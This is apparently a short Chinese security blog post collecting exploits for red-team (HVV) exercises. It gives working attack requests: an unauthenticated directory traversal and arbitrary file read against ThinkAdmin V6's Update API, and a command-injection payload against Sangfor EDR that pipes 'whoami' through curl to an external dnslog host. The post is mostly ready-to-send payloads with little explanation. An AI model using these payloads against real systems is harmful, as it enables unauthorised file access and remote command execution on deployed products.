乐于分享 共同成长

JE2Se ,一个不怎么努力上进的小菜鸡

HVV漏洞合集EXP3

一、ThinkAdminV6 任意文件操作

Update.php 三个函数未校验访问权限

目录遍历注意POST数据包rules参数值需要URL编码

POST /admin.html?s=admin/api.Update/node
rules=%5B%22.%2F%22%5D

《HVV漏洞合集EXP3》文件读取,后面那一串是UTF8字符串加密后的结果。计算方式在Update.php中的加密函数。

/admin.html?s=admin/api.Update/get/encode/
34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b2r33322u2x2v1b2s2p382p2q2p372t0y342w34

《HVV漏洞合集EXP3》

二、深信服EDR 远程命令执行

遇到这样的漏洞反手就是一个赞。

/api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9
{"params": "w=123\"'1234123'\"|curl `whoami`.dnslog.cn"}《HVV漏洞合集EXP3》
点赞

发表评论

电子邮件地址不会被公开。 必填项已用*标注

9 − 3 =